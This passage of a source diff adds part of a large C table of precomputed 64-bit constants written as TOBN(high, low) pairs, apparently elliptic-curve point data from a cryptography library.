+     TOBN(0xbec2dd00, 0x81dcd44d), TOBN(0xca3d7f0f, 0xc42ac82d),
+     TOBN(0x1f3db085, 0xfdaf4520), TOBN(0xbb6d3e80, 0x4549daf2),
+     TOBN(0xf5969d8a, 0x19ad5c42), TOBN(0x7052b13d, 0xdbfd1511),
+     TOBN(0x11890d1b, 0x682b9060), TOBN(0xa71d3883, 0xac34452c),
+     TOBN(0xa438055b, 0x783805b4), TOBN(0x43241277, 0x4725b23e),
+     TOBN(0xf20cf96e, 0x4901bbed), TOBN(0x6419c710, 0xf432a2bb),
+     TOBN(0x57a0fbb9, 0xdfa9cd7d), TOBN(0x589111e4, 0x00daa249),
+     TOBN(0x19809a33, 0x7b60554e), TOBN(0xea5f8887, 0xede283a4),
+     TOBN(0x2d713802, 0x503bfd35), TOBN(0x151bb0af, 0x585d2a53),
+     TOBN(0x40b08f74, 0x43b30ca8), TOBN(0xe10b5bba, 0xd9934583),
+     TOBN(0xe8a546d6, 0xb51110ad), TOBN(0x1dd50e66, 0x28e0b6c5),
+     TOBN(0x292e9d54, 0xcff2b821), TOBN(0x3882555d, 0x47281760),
+     TOBN(0x134838f8, 0x3724d6e3), TOBN(0xf2c679e0, 0x22ddcda1),
+     TOBN(0x40ee8815, 0x6d2a5768), TOBN(0x7f227bd2, 0x1c1e7e2d),
+     TOBN(0x487ba134, 0xd04ff443), TOBN(0x76e2ff3d, 0xc614e54b),
+     TOBN(0x36b88d6f, 0xa3177ec7), TOBN(0xbf731d51, 0x2328fff5),
+     TOBN(0x758caea2, 0x49ba158e), TOBN(0x5ab8ff4c, 0x02938188),
+     TOBN(0x33e16056, 0x35edc56d), TOBN(0x5a69d349, 0x7e940d79),
+     TOBN(0x6c4fd001, 0x03866dcb), TOBN(0x20a38f57, 0x4893cdef),
+     TOBN(0xfbf3e790, 0xfac3a15b), TOBN(0x6ed7ea2e, 0x7a4f8e6b),
+     TOBN(0xa663eb4f, 0xbc3aca86), TOBN(0x22061ea5, 0x080d53f7),
+     TOBN(0x2480dfe6, 0xf546783f), TOBN(0xd38bc6da, 0x5a0a641e),
+     TOBN(0xfb093cd1, 0x2ede8965), TOBN(0x89654db4, 0xacb455cf),
+     TOBN(0x413cbf9a, 0x26e1adee), TOBN(0x291f3764, 0x373294d4),
+     TOBN(0x00797257, 0x648083fe), TOBN(0x25f504d3, 0x208cc341),
+     TOBN(0x635a8e5e, 0xc3a0ee43), TOBN(0x70aaebca, 0x679898ff),
+     TOBN(0x9ee9f547, 0x5dc63d56), TOBN(0xce987966, 0xffb34d00),
+     TOBN(0xf9f86b19, 0x5e26310a), TOBN(0x9e435484, 0x382a8ca8),
+     TOBN(0x253bcb81, 0xc2352fe4), TOBN(0xa4eac8b0, 0x4474b571),
+     TOBN(0xc1b97512, 0xc1ad8cf8), TOBN(0x193b4e9e, 0x99e0b697),
+     TOBN(0x939d2716, 0x01e85df0), TOBN(0x4fb265b3, 0xcd44eafd),
+     TOBN(0x321e7dcd, 0xe51e1ae2), TOBN(0x8e3a8ca6, 0xe3d8b096),
+     TOBN(0x8de46cb0, 0x52604998), TOBN(0x91099ad8, 0x39072aa7),
+     TOBN(0x2617f91c, 0x93aa96b8), TOBN(0x0fc8716b, 0x7fca2e13),
+     TOBN(0xa7106f5e, 0x95328723), TOBN(0xd1c9c40b, 0x262e6522),
+     TOBN(0xb9bafe86, 0x42b7c094), TOBN(0x1873439d, 0x1543c021),
+     TOBN(0xe1baa5de, 0x5cbefd5d), TOBN(0xa363fc5e, 0x521e8aff),
+     TOBN(0xefe6320d, 0xf862eaac), TOBN(0x14419c63, 0x22c647dc),
+     TOBN(0x0e06707c, 0x4e46d428), TOBN(0xcb6c834f, 0x4a178f8f),
+     TOBN(0x0f993a45, 0xd30f917c), TOBN(0xd4c4b049, 0x9879afee),
+     TOBN(0xb6142a1e, 0x70500063), TOBN(0x7c9b41c3, 0xa5d9d605),
+     TOBN(0xbc00fc2f, 0x2f8ba2c7), TOBN(0x0966eb2f, 0x7c67aa28),
+     TOBN(0x13f7b516, 0x5a786972), TOBN(0x3bfb7557, 0x8a2fbba0),
+     TOBN(0x131c4f23, 0x5a2b9620), TOBN(0xbff3ed27, 0x6faf46be),
+     TOBN(0x9b4473d1, 0x7e172323), TOBN(0x421e8878, 0x339f6246),
+     TOBN(0x0fa8587a, 0x25a41632), TOBN(0xc0814124, 0xa35b6c93),
+     TOBN(0x2b18a9f5, 0x59ebb8db), TOBN(0x264e3357, 0x76edb29c),
+     TOBN(0xaf245ccd, 0xc87c51e2), TOBN(0x16b3015b, 0x501e6214),
+     TOBN(0xbb31c560, 0x0a3882ce), TOBN(0x6961bb94, 0xfec11e04),
+     TOBN(0x3b825b8d, 0xeff7a3a0), TOBN(0xbec33738, 0xb1df7326),
+     TOBN(0x68ad747c, 0x99604a1f), TOBN(0xd154c934, 0x9a3bd499),
+     TOBN(0xac33506f, 0x1cc7a906), TOBN(0x73bb5392, 0x6c560e8f),
+     TOBN(0x6428fcbe, 0x263e3944), TOBN(0xc11828d5, 0x1c387434),
+     TOBN(0x3cd04be1, 0x3e4b12ff), TOBN(0xc3aad9f9, 0x2d88667c),
+     TOBN(0xc52ddcf8, 0x248120cf), TOBN(0x985a892e, 0x2a389532),
+     TOBN(0xfbb4b21b, 0x3bb85fa0), TOBN(0xf95375e0, 0x8dfc6269),
+     TOBN(0xfb4fb06c, 0x7ee2acea), TOBN(0x6785426e, 0x309c4d1f),
+     TOBN(0x659b17c8, 0xd8ceb147), TOBN(0x9b649eee, 0xb70a5554),
+     TOBN(0x6b7fa0b5, 0xac6bc634), TOBN(0xd99fe2c7, 0x1d6e732f),
+     TOBN(0x30e6e762, 0x8d3abba2), TOBN(0x18fee6e7, 0xa797b799),
+     TOBN(0x5c9d360d, 0xc696464d), TOBN(0xe3baeb48, 0x27bfde12),
+     TOBN(0x2bf5db47, 0xf23206d5), TOBN(0x2f6d3420, 0x1d260152),
+     TOBN(0x17b87653, 0x3f8ff89a), TOBN(0x5157c30c, 0x378fa458),
+     TOBN(0x7517c5c5, 0x2d4fb936), TOBN(0xef22f7ac, 0xe6518cdc),
+     TOBN(0xdeb483e6, 0xbf847a64), TOBN(0xf5084558, 0x92e0fa89),}
+    ,
+    {TOBN(0xab9659d8, 0xdf7304d4), TOBN(0xb71bcf1b, 0xff210e8e),
+     TOBN(0xa9a2438b, 0xd73fbd60), TOBN(0x4595cd1f, 0x5d11b4de),
+     TOBN(0x9c0d329a, 0x4835859d), TOBN(0x4a0f0d2d, 0x7dbb6e56),
+     TOBN(0xc6038e5e, 0xdf928a4e), TOBN(0xc9429621, 0x8f5ad154),
+     TOBN(0x91213462, 0xf23f2d92), TOBN(0x6cab71bd, 0x60b94078),
+     TOBN(0x6bdd0a63, 0x176cde20), TOBN(0x54c9b20c, 0xee4d54bc),
+     TOBN(0x3cd2d8aa, 0x9f2ac02f), TOBN(0x03f8e617, 0x206eedb0),
+     TOBN(0xc7f68e16, 0x93086434), TOBN(0x831469c5, 0x92dd3db9),
+     TOBN(0x8521df24, 0x8f981354), TOBN(0x587e23ec, 0x3588a259),
+     TOBN(0xcbedf281, 0xd7a0992c), TOBN(0x06930a55, 0x38961407),
+     TOBN(0x09320deb, 0xbe5bbe21), TOBN(0xa7ffa5b5, 0x2491817f),
+     TOBN(0xe6c8b4d9, 0x09065160), TOBN(0xac4f3992, 0xfff6d2a9),
+     TOBN(0x7aa7a158, 0x3ae9c1bd), TOBN(0xe0af6d98, 0xe37ce240),
+     TOBN(0xe54342d9, 0x28ab38b4), TOBN(0xe8b75007, 0x0a1c98ca),
+     TOBN(0xefce86af, 0xe02358f2), TOBN(0x31b8b856, 0xea921228),
+     TOBN(0x052a1912, 0x0a1c67fc), TOBN(0xb4069ea4, 0xe3aead59),
+     TOBN(0x3232d6e2, 0x7fa03cb3), TOBN(0xdb938e5b, 0x0fdd7d88),
+     TOBN(0x04c1d2cd, 0x2ccbfc5d), TOBN(0xd2f45c12, 0xaf3a580f),
+     TOBN(0x592620b5, 0x7883e614), TOBN(0x5fd27e68, 0xbe7c5f26),
+     TOBN(0x139e45a9, 0x1567e1e3), TOBN(0x2cc71d2d, 0x44d8aaaf),
+     TOBN(0x4a9090cd, 0xe36d0757), TOBN(0xf722d7b1, 0xd9a29382),
+     TOBN(0xfb7fb04c, 0x04b48ddf), TOBN(0x628ad2a7, 0xebe16f43),
+     TOBN(0xcd3fbfb5, 0x20226040), TOBN(0x6c34ecb1, 0x5104b6c4),
+     TOBN(0x30c0754e, 0xc903c188), TOBN(0xec336b08, 0x2d23cab0),
+     TOBN(0x473d62a2, 0x1e206ee5), TOBN(0xf1e27480, 0x8c49a633),
+     TOBN(0x87ab956c, 0xe9f6b2c3), TOBN(0x61830b48, 0x62b606ea),
+     TOBN(0x67cd6846, 0xe78e815f), TOBN(0xfe40139f, 0x4c02082a),
+     TOBN(0x52bbbfcb, 0x952ec365), TOBN(0x74c11642, 0x6b9836ab),
+     TOBN(0x9f51439e, 0x558df019), TOBN(0x230da4ba, 0xac712b27),
+     TOBN(0x518919e3, 0x55185a24), TOBN(0x4dcefcdd, 0x84b78f50),
+     TOBN(0xa7d90fb2, 0xa47d4c5a), TOBN(0x55ac9abf, 0xb30e009e),
+     TOBN(0xfd2fc359, 0x74eed273), TOBN(0xb72d824c, 0xdbea8faf),
+     TOBN(0xce721a74, 0x4513e2ca), TOBN(0x0b418612, 0x38240b2c),
+     TOBN(0x05199968, 0xd5baa450), TOBN(0xeb1757ed, 0x2b0e8c25),
+     TOBN(0x6ebc3e28, 0x3dfac6d5), TOBN(0xb2431e2e, 0x48a237f5),
+     TOBN(0x2acb5e23, 0x52f61499), TOBN(0x5558a2a7, 0xe06c936b),
+     TOBN(0xd213f923, 0xcbb13d1b), TOBN(0x98799f42, 0x5bfb9bfe),
+     TOBN(0x1ae8ddc9, 0x701144a9), TOBN(0x0b8b3bb6, 0x4c5595ee),
+     TOBN(0x0ea9ef2e, 0x3ecebb21), TOBN(0x17cb6c4b, 0x3671f9a7),
+     TOBN(0x47ef464f, 0x726f1d1f), TOBN(0x171b9484, 0x6943a276),
+     TOBN(0x51a4ae2d, 0x7ef0329c), TOBN(0x08509222, 0x91c4402a),
+     TOBN(0x64a61d35, 0xafd45bbc), TOBN(0x38f096fe, 0x3035a851),
+     TOBN(0xc7468b74, 0xa1dec027), TOBN(0xe8cf10e7, 0x4fc7dcba),
+     TOBN(0xea35ff40, 0xf4a06353), TOBN(0x0b4c0dfa, 0x8b77dd66),
+     TOBN(0x779b8552, 0xde7e5c19), TOBN(0xfab28609, 0xc1c0256c),
+     TOBN(0x64f58eee, 0xabd4743d), TOBN(0x4e8ef838, 0x7b6cc93b),
+     TOBN(0xee650d26, 0x4cb1bf3d), TOBN(0x4c1f9d09, 0x73dedf61),
+     TOBN(0xaef7c9d7, 0xbfb70ced), TOBN(0x1ec0507e, 0x1641de1e),
+     TOBN(0xcd7e5cc7, 0xcde45079), TOBN(0xde173c9a, 0x516ac9e4),
+     TOBN(0x517a8494, 0xc170315c), TOBN(0x438fd905, 0x91d8e8fb),
+     TOBN(0x5145c506, 0xc7d9630b), TOBN(0x6457a87b, 0xf47d4d75),
+     TOBN(0xd31646bf, 0x0d9a80e8), TOBN(0x453add2b, 0xcef3aabe),
+     TOBN(0xc9941109, 0xa607419d), TOBN(0xfaa71e62, 0xbb6bca80),
+     TOBN(0x34158c13, 0x07c431f3), TOBN(0x594abebc, 0x992bc47a),
+     TOBN(0x6dfea691, 0xeb78399f), TOBN(0x48aafb35, 0x3f42cba4),
+     TOBN(0xedcd65af, 0x077c04f0), TOBN(0x1a29a366, 0xe884491a),
+     TOBN(0x023a40e5, 0x1c21f2bf), TOBN(0xf99a513c, 0xa5057aee),
+     TOBN(0xa3fe7e25, 0xbcab072e), TOBN(0x8568d2e1, 0x40e32bcf),
+     TOBN(0x904594eb, 0xd3f69d9f), TOBN(0x181a9733, 0x07affab1),
+     TOBN(0xe4d68d76, 0xb6e330f4), TOBN(0x87a6dafb, 0xc75a7fc1),
+     TOBN(0x549db2b5, 0xef7d9289), TOBN(0x2480d4a8, 0x197f015a),
+     TOBN(0x61d5590b, 0xc40493b6), TOBN(0x3a55b52e, 0x6f780331),
+     TOBN(0x40eb8115, 0x309eadb0), TOBN(0xdea7de5a, 0x92e5c625),
+     TOBN(0x64d631f0, 0xcc6a3d5a), TOBN(0x9d5e9d7c, 0x93e8dd61),
+     TOBN(0xf297bef5, 0x206d3ffc), TOBN(0x23d5e033, 0x7d808bd4),
+     TOBN(0x4a4f6912, 0xd24cf5ba), TOBN(0xe4d8163b, 0x09cdaa8a),
+     TOBN(0x0e0de9ef, 0xd3082e8e), TOBN(0x4fe1246c, 0x0192f360),
+     TOBN(0x1f900150, 0x4b8eee0a), TOBN(0x5219da81, 0xf1da391b),
+     TOBN(0x7bf6a5c1, 0xf7ea25aa), TOBN(0xd165e6bf, 0xfbb07d5f),
+     TOBN(0xe3539361, 0x89e78671), TOBN(0xa3fcac89, 0x2bac4219),
+     TOBN(0xdfab6fd4, 0xf0baa8ab), TOBN(0x5a4adac1, 0xe2c1c2e5),
+     TOBN(0x6cd75e31, 0x40d85849), TOBN(0xce263fea, 0x19b39181),
+     TOBN(0xcb6803d3, 0x07032c72), TOBN(0x7f40d5ce, 0x790968c8),
+     TOBN(0xa6de86bd, 0xdce978f0), TOBN(0x25547c4f, 0x368f751c),
+     TOBN(0xb1e685fd, 0x65fb2a9e), TOBN(0xce69336f, 0x1eb9179c),
+     TOBN(0xb15d1c27, 0x12504442), TOBN(0xb7df465c, 0xb911a06b),
+     TOBN(0xb8d804a3, 0x315980cd), TOBN(0x693bc492, 0xfa3bebf7),
+     TOBN(0x3578aeee, 0x2253c504), TOBN(0x158de498, 0xcd2474a2),
+     TOBN(0x1331f5c7, 0xcfda8368), TOBN(0xd2d7bbb3, 0x78d7177e),
+     TOBN(0xdf61133a, 0xf3c1e46e), TOBN(0x5836ce7d, 0xd30e7be8),
+     TOBN(0x83084f19, 0x94f834cb), TOBN(0xd35653d4, 0x429ed782),
+     TOBN(0xa542f16f, 0x59e58243), TOBN(0xc2b52f65, 0x0470a22d),
+     TOBN(0xe3b6221b, 0x18f23d96), TOBN(0xcb05abac, 0x3f5252b4),
+     TOBN(0xca00938b, 0x87d61402), TOBN(0x2f186cdd, 0x411933e4),
+     TOBN(0xe042ece5, 0x9a29a5c5), TOBN(0xb19b3c07, 0x3b6c8402),
+     TOBN(0xc97667c7, 0x19d92684), TOBN(0xb5624622, 0xebc66372),
+     TOBN(0x0cb96e65, 0x3c04fa02), TOBN(0x83a7176c, 0x8eaa39aa),
+     TOBN(0x2033561d, 0xeaa1633f), TOBN(0x45a9d086, 0x4533df73),
+     TOBN(0xe0542c1d, 0x3dc090bc), TOBN(0x82c996ef, 0xaa59c167),
+     TOBN(0xe3f735e8, 0x0ee7fc4d), TOBN(0x7b179393, 0x7c35db79),
+     TOBN(0xb6419e25, 0xf8c5dbfd), TOBN(0x4d9d7a1e, 0x1f327b04),
+     TOBN(0x979f6f9b, 0x298dfca8), TOBN(0xc7c5dff1, 0x8de9366a),
+     TOBN(0x1b7a588d, 0x04c82bdd), TOBN(0x68005534, 0xf8319dfd),
+     TOBN(0xde8a55b5, 0xd8eb9580), TOBN(0x5ea886da, 0x8d5bca81),
+     TOBN(0xe8530a01, 0x252a0b4d), TOBN(0x1bffb4fe, 0x35eaa0a1),
+     TOBN(0x2ad828b1, 0xd8e99563), TOBN(0x7de96ef5, 0x95f9cd87),
+     TOBN(0x4abb2d0c, 0xd77d970c), TOBN(0x03cfb933, 0xd33ef9cb),
+     TOBN(0xb0547c01, 0x8b211fe9), TOBN(0x2fe64809, 0xa56ed1c6),
+     TOBN(0xcb7d5624, 0xc2ac98cc), TOBN(0x2a1372c0, 0x1a393e33),
+     TOBN(0xc8d1ec1c, 0x29660521), TOBN(0xf3d31b04, 0xb37ac3e9),
+     TOBN(0xa29ae9df, 0x5ece6e7c), TOBN(0x0603ac8f, 0x0facfb55),
+     TOBN(0xcfe85b7a, 0xdda233a5), TOBN(0xe618919f, 0xbd75f0b8),
+     TOBN(0xf555a3d2, 0x99bf1603), TOBN(0x1f43afc9, 0xf184255a),
+     TOBN(0xdcdaf341, 0x319a3e02), TOBN(0xd3b117ef, 0x03903a39),
+     TOBN(0xe095da13, 0x65d1d131), TOBN(0x86f16367, 0xc37ad03e),
+     TOBN(0x5f37389e, 0x462cd8dd), TOBN(0xc103fa04, 0xd67a60e6),
+     TOBN(0x57c34344, 0xf4b478f0), TOBN(0xce91edd8, 0xe117c98d),
+     TOBN(0x001777b0, 0x231fc12e), TOBN(0x11ae47f2, 0xb207bccb),
+     TOBN(0xd983cf8d, 0x20f8a242), TOBN(0x7aff5b1d, 0xf22e1ad8),
+     TOBN(0x68fd11d0, 0x7fc4feb3), TOBN(0x5d53ae90, 0xb0f1c3e1),
+     TOBN(0x50fb7905, 0xec041803), TOBN(0x85e3c977, 0x14404888),
+     TOBN(0x0e67faed, 0xac628d8f), TOBN(0x2e865150, 0x6668532c),
+     TOBN(0x15acaaa4, 0x6a67a6b0), TOBN(0xf4cdee25, 0xb25cec41),
+     TOBN(0x49ee565a, 0xe4c6701e), TOBN(0x2a04ca66, 0xfc7d63d8),
+     TOBN(0xeb105018, 0xef0543fb), TOBN(0xf709a4f5, 0xd1b0d81d),
+     TOBN(0x5b906ee6, 0x2915d333), TOBN(0xf4a87412, 0x96f1f0ab),
+     TOBN(0xb6b82fa7, 0x4d82f4c2), TOBN(0x90725a60, 0x6804efb3),
+     TOBN(0xbc82ec46, 0xadc3425e), TOBN(0xb7b80581, 0x2787843e),
+     TOBN(0xdf46d91c, 0xdd1fc74c), TOBN(0xdc1c62cb, 0xe783a6c4),
+     TOBN(0x59d1b9f3, 0x1a04cbba), TOBN(0xd87f6f72, 0x95e40764),
+     TOBN(0x02b4cfc1, 0x317f4a76), TOBN(0x8d2703eb, 0x91036bce),
+     TOBN(0x98206cc6, 0xa5e72a56), TOBN(0x57be9ed1, 0xcf53fb0f),
+     TOBN(0x09374571, 0xef0b17ac), TOBN(0x74b2655e, 0xd9181b38),
+     TOBN(0xc8f80ea8, 0x89935d0e), TOBN(0xc0d9e942, 0x91529936),
+     TOBN(0x19686041, 0x1e84e0e5), TOBN(0xa5db84d3, 0xaea34c93),
+     TOBN(0xf9d5bb19, 0x7073a732), TOBN(0xb8d2fe56, 0x6bcfd7c0),
+     TOBN(0x45775f36, 0xf3eb82fa), TOBN(0x8cb20ccc, 0xfdff8b58),
+     TOBN(0x1659b65f, 0x8374c110), TOBN(0xb8b4a422, 0x330c789a),
+     TOBN(0x75e3c3ea, 0x6fe8208b), TOBN(0xbd74b9e4, 0x286e78fe),
+     TOBN(0x0be2e81b, 0xd7d93a1a), TOBN(0x7ed06e27, 0xdd0a5aae),
+     TOBN(0x721f5a58, 0x6be8b800), TOBN(0x428299d1, 0xd846db28),
+     TOBN(0x95cb8e6b, 0x5be88ed3), TOBN(0xc3186b23, 0x1c034e11),
+     TOBN(0xa6312c9e, 0x8977d99b), TOBN(0xbe944331, 0x83f531e7),
+     TOBN(0x8232c0c2, 0x18d3b1d4), TOBN(0x617aae8b, 0xe1247b73),
+     TOBN(0x40153fc4, 0x282aec3b), TOBN(0xc6063d2f, 0xf7b8f823),
+     TOBN(0x68f10e58, 0x3304f94c), TOBN(0x31efae74, 0xee676346),
+     TOBN(0xbadb6c6d, 0x40a9b97c), TOBN(0x14702c63, 0x4f666256),
+     TOBN(0xdeb954f1, 0x5184b2e3), TOBN(0x5184a526, 0x94b6ca40),
+     TOBN(0xfff05337, 0x003c32ea), TOBN(0x5aa374dd, 0x205974c7),
+     TOBN(0x9a763854, 0x4b0dd71a), TOBN(0x459cd27f, 0xdeb947ec),
+     TOBN(0xa6e28161, 0x459c2b92), TOBN(0x2f020fa8, 0x75ee8ef5),
+     TOBN(0xb132ec2d, 0x30b06310), TOBN(0xc3e15899, 0xbc6a4530),
+     TOBN(0xdc5f53fe, 0xaa3f451a), TOBN(0x3a3c7f23, 0xc2d9acac),
+     TOBN(0x2ec2f892, 0x6b27e58b), TOBN(0x68466ee7, 0xd742799f),
+     TOBN(0x98324dd4, 0x1fa26613), TOBN(0xa2dc6dab, 0xbdc29d63),
+     TOBN(0xf9675faa, 0xd712d657), TOBN(0x813994be, 0x21fd8d15),
+     TOBN(0x5ccbb722, 0xfd4f7553), TOBN(0x5135ff8b, 0xf3a36b20),
+     TOBN(0x44be28af, 0x69559df5), TOBN(0x40b65bed, 0x9d41bf30),
+     TOBN(0xd98bf2a4, 0x3734e520), TOBN(0x5e3abbe3, 0x209bdcba),
+     TOBN(0x77c76553, 0xbc945b35), TOBN(0x5331c093, 0xc6ef14aa),
+     TOBN(0x518ffe29, 0x76b60c80), TOBN(0x2285593b, 0x7ace16f8),
+     TOBN(0xab1f64cc, 0xbe2b9784), TOBN(0xe8f2c0d9, 0xab2421b6),
+     TOBN(0x617d7174, 0xc1df065c), TOBN(0xafeeb5ab, 0x5f6578fa),
+     TOBN(0x16ff1329, 0x263b54a8), TOBN(0x45c55808, 0xc990dce3),
+     TOBN(0x42eab6c0, 0xecc8c177), TOBN(0x799ea9b5, 0x5982ecaa),
+     TOBN(0xf65da244, 0xb607ef8e), TOBN(0x8ab226ce, 0x32a3fc2c),
+     TOBN(0x745741e5, 0x7ea973dc), TOBN(0x5c00ca70, 0x20888f2e),
+     TOBN(0x7cdce3cf, 0x45fd9cf1), TOBN(0x8a741ef1, 0x5507f872),
+     TOBN(0x47c51c2f, 0x196b4cec), TOBN(0x70d08e43, 0xc97ea618),
+     TOBN(0x930da15c, 0x15b18a2b), TOBN(0x33b6c678, 0x2f610514),
+     TOBN(0xc662e4f8, 0x07ac9794), TOBN(0x1eccf050, 0xba06cb79),
+     TOBN(0x1ff08623, 0xe7d954e5), TOBN(0x6ef2c5fb, 0x24cf71c3),
+     TOBN(0xb2c063d2, 0x67978453), TOBN(0xa0cf3796, 0x1d654af8),
+     TOBN(0x7cb242ea, 0x7ebdaa37), TOBN(0x206e0b10, 0xb86747e0),
+     TOBN(0x481dae5f, 0xd5ecfefc), TOBN(0x07084fd8, 0xc2bff8fc),
+     TOBN(0x8040a01a, 0xea324596), TOBN(0x4c646980, 0xd4de4036),
+     TOBN(0x9eb8ab4e, 0xd65abfc3), TOBN(0xe01cb91f, 0x13541ec7),
+     TOBN(0x8f029adb, 0xfd695012), TOBN(0x9ae28483, 0x3c7569ec),
+     TOBN(0xa5614c9e, 0xa66d80a1), TOBN(0x680a3e44, 0x75f5f911),
+     TOBN(0x0c07b14d, 0xceba4fc1), TOBN(0x891c285b, 0xa13071c1),
+     TOBN(0xcac67ceb, 0x799ece3c), TOBN(0x29b910a9, 0x41e07e27),
+     TOBN(0x66bdb409, 0xf2e43123), TOBN(0x06f8b137, 0x7ac9ecbe),
+     TOBN(0x5981fafd, 0x38547090), TOBN(0x19ab8b9f, 0x85e3415d),
+     TOBN(0xfc28c194, 0xc7e31b27), TOBN(0x843be0aa, 0x6fbcbb42),
+     TOBN(0xf3b1ed43, 0xa6db836c), TOBN(0x2a1330e4, 0x01a45c05),
+     TOBN(0x4f19f3c5, 0x95c1a377), TOBN(0xa85f39d0, 0x44b5ee33),
+     TOBN(0x3da18e6d, 0x4ae52834), TOBN(0x5a403b39, 0x7423dcb0),
+     TOBN(0xbb555e0a, 0xf2374aef), TOBN(0x2ad599c4, 0x1e8ca111),
+     TOBN(0x1b3a2fb9, 0x014b3bf8), TOBN(0x73092684, 0xf66d5007),
+     TOBN(0x079f1426, 0xc4340102), TOBN(0x1827cf81, 0x8fddf4de),
+     TOBN(0xc83605f6, 0xf10ff927), TOBN(0xd3871451, 0x23739fc6),
+     TOBN(0x6d163450, 0xcac1c2cc), TOBN(0x6b521296, 0xa2ec1ac5),
+     TOBN(0x0606c4f9, 0x6e3cb4a5), TOBN(0xe47d3f41, 0x778abff7),
+     TOBN(0x425a8d5e, 0xbe8e3a45), TOBN(0x53ea9e97, 0xa6102160),
+     TOBN(0x477a106e, 0x39cbb688), TOBN(0x532401d2, 0xf3386d32),
+     TOBN(0x8e564f64, 0xb1b9b421), TOBN(0xca9b8388, 0x81dad33f),
+     TOBN(0xb1422b4e, 0x2093913e), TOBN(0x533d2f92, 0x69bc8112),
+     TOBN(0x3fa017be, 0xebe7b2c7), TOBN(0xb2767c4a, 0xcaf197c6),
+     TOBN(0xc925ff87, 0xaedbae9f), TOBN(0x7daf0eb9, 0x36880a54),
+     TOBN(0x9284ddf5, 0x9c4d0e71), TOBN(0x1581cf93, 0x316f8cf5),
+     TOBN(0x3eeca887, 0x3ac1f452), TOBN(0xb417fce9, 0xfb6aeffe),
+     TOBN(0xa5918046, 0xeefb8dc3), TOBN(0x73d318ac, 0x02209400),
+     TOBN(0xe800400f, 0x728693e5), TOBN(0xe87d814b, 0x339927ed),
+     TOBN(0x93e94d3b, 0x57ea9910), TOBN(0xff8a35b6, 0x2245fb69),
+     TOBN(0x043853d7, 0x7f200d34), TOBN(0x470f1e68, 0x0f653ce1),
+     TOBN(0x81ac05bd, 0x59a06379), TOBN(0xa14052c2, 0x03930c29),
+     TOBN(0x6b72fab5, 0x26bc2797), TOBN(0x13670d16, 0x99f16771),
+     TOBN(0x00170052, 0x1e3e48d1), TOBN(0x978fe401, 0xb7adf678),
+     TOBN(0x55ecfb92, 0xd41c5dd4), TOBN(0x5ff8e247, 0xc7b27da5),
+     TOBN(0xe7518272, 0x013fb606), TOBN(0x5768d7e5, 0x2f547a3c),
+     TOBN(0xbb24eaa3, 0x60017a5f), TOBN(0x6b18e6e4, 0x9c64ce9b),
+     TOBN(0xc225c655, 0x103dde07), TOBN(0xfc3672ae, 0x7592f7ea),
+     TOBN(0x9606ad77, 0xd06283a1), TOBN(0x542fc650, 0xe4d59d99),
+     TOBN(0xabb57c49, 0x2a40e7c2), TOBN(0xac948f13, 0xa8db9f55),
+     TOBN(0x6d4c9682, 0xb04465c3), TOBN(0xe3d062fa, 0x6468bd15),
+     TOBN(0xa51729ac, 0x5f318d7e), TOBN(0x1fc87df6, 0x9eb6fc95),
+     TOBN(0x63d146a8, 0x0591f652), TOBN(0xa861b8f7, 0x589621aa),
+     TOBN(0x59f5f15a, 0xce31348c), TOBN(0x8f663391, 0x440da6da),
+     TOBN(0xcfa778ac, 0xb591ffa3), TOBN(0x027ca9c5, 0x4cdfebce),
+     TOBN(0xbe8e05a5, 0x444ea6b3), TOBN(0x8aab4e69, 0xa78d8254),
+     TOBN(0x2437f04f, 0xb474d6b8), TOBN(0x6597ffd4, 0x045b3855),
+     TOBN(0xbb0aea4e, 0xca47ecaa), TOBN(0x568aae83, 0x85c7ebfc),
+     TOBN(0x0e966e64, 0xc73b2383), TOBN(0x49eb3447, 0xd17d8762),
+     TOBN(0xde107821, 0x8da05dab), TOBN(0x443d8baa, 0x016b7236),
+     TOBN(0x163b63a5, 0xea7610d6), TOBN(0xe47e4185, 0xce1ca979),
+     TOBN(0xae648b65, 0x80baa132), TOBN(0xebf53de2, 0x0e0d5b64),
+     TOBN(0x8d3bfcb4, 0xd3c8c1ca), TOBN(0x0d914ef3, 0x5d04b309),
+     TOBN(0x55ef6415, 0x3de7d395), TOBN(0xbde1666f, 0x26b850e8),
+     TOBN(0xdbe1ca6e, 0xd449ab19), TOBN(0x8902b322, 0xe89a2672),
+     TOBN(0xb1674b7e, 0xdacb7a53), TOBN(0x8e9faf6e, 0xf52523ff),
+     TOBN(0x6ba535da, 0x9a85788b), TOBN(0xd21f03ae, 0xbd0626d4),
+     TOBN(0x099f8c47, 0xe873dc64), TOBN(0xcda8564d, 0x018ec97e),
+     TOBN(0x3e8d7a5c, 0xde92c68c), TOBN(0x78e035a1, 0x73323cc4),
+     TOBN(0x3ef26275, 0xf880ff7c), TOBN(0xa4ee3dff, 0x273eedaa),
+     TOBN(0x58823507, 0xaf4e18f8), TOBN(0x967ec9b5, 0x0672f328),
+     TOBN(0x9ded19d9, 0x559d3186), TOBN(0x5e2ab3de, 0x6cdce39c),
+     TOBN(0xabad6e4d, 0x11c226df), TOBN(0xf9783f43, 0x87723014),
+     TOBN(0x9a49a0cf, 0x1a885719), TOBN(0xfc0c1a5a, 0x90da9dbf),
+     TOBN(0x8bbaec49, 0x571d92ac), TOBN(0x569e85fe, 0x4692517f),
+     TOBN(0x8333b014, 0xa14ea4af), TOBN(0x32f2a62f, 0x12e5c5ad),
+     TOBN(0x98c2ce3a, 0x06d89b85), TOBN(0xb90741aa, 0x2ff77a08),
+     TOBN(0x2530defc, 0x01f795a2), TOBN(0xd6e5ba0b, 0x84b3c199),
+     TOBN(0x7d8e8451, 0x12e4c936), TOBN(0xae419f7d, 0xbd0be17b),
+     TOBN(0xa583fc8c, 0x22262bc9), TOBN(0x6b842ac7, 0x91bfe2bd),
+     TOBN(0x33cef4e9, 0x440d6827), TOBN(0x5f69f4de, 0xef81fb14),
+     TOBN(0xf16cf6f6, 0x234fbb92), TOBN(0x76ae3fc3, 0xd9e7e158),
+     TOBN(0x4e89f6c2, 0xe9740b33), TOBN(0x677bc85d, 0x4962d6a1),
+     TOBN(0x6c6d8a7f, 0x68d10d15), TOBN(0x5f9a7224, 0x0257b1cd),
+     TOBN(0x7096b916, 0x4ad85961), TOBN(0x5f8c47f7, 0xe657ab4a),
+     TOBN(0xde57d7d0, 0xf7461d7e), TOBN(0x7eb6094d, 0x80ce5ee2),
+     TOBN(0x0b1e1dfd, 0x34190547), TOBN(0x8a394f43, 0xf05dd150),
+     TOBN(0x0a9eb24d, 0x97df44e6), TOBN(0x78ca06bf, 0x87675719),
